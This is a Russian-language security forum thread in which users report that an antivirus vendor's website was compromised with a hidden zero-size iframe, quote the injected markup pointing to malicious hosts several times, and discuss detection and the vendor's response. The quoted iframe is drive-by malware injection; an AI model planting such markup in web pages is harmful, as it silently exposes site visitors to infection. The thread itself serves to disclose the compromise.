Перейти к содержанию

Recommended Posts

Umnik

На http://esetnod32.ru/ висит скрытый фрейм:

</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe></html>

Говорят, минимум второй день висит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ALEX(XX)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
EzzO

ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

iFrame я больше не вижу на странице.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller

Уже значит убрали.

Сейчас они типа расследование будут проводить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

ага

По данному инциденту в настоящее время проводится проверка.

вот интересно - а взламывали ли сайты других вендоров??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

Жесть ваще....Заговор внутри компании? ))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
м.б типичное разгильдяйство?..

Это, скорее всего, уже как следствие! )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Антивирусы реагируют?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))

Ваще жесть....дааааааа

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Форум anti-malware.ru атакован спамерами?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Форум anti-malware.ru атакован спамерами?

Это почему?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Ну по моим личным наблюдениям сложилось такое мнение :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А сайт до сих пор инфицирован...уже и письмо им написал, и позвонил....Без толку!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Danilka
Антивирусы реагируют?

KIS 2010 да.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А НОД не реагирует! ((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Fox

Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Остаётся только задуматься!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×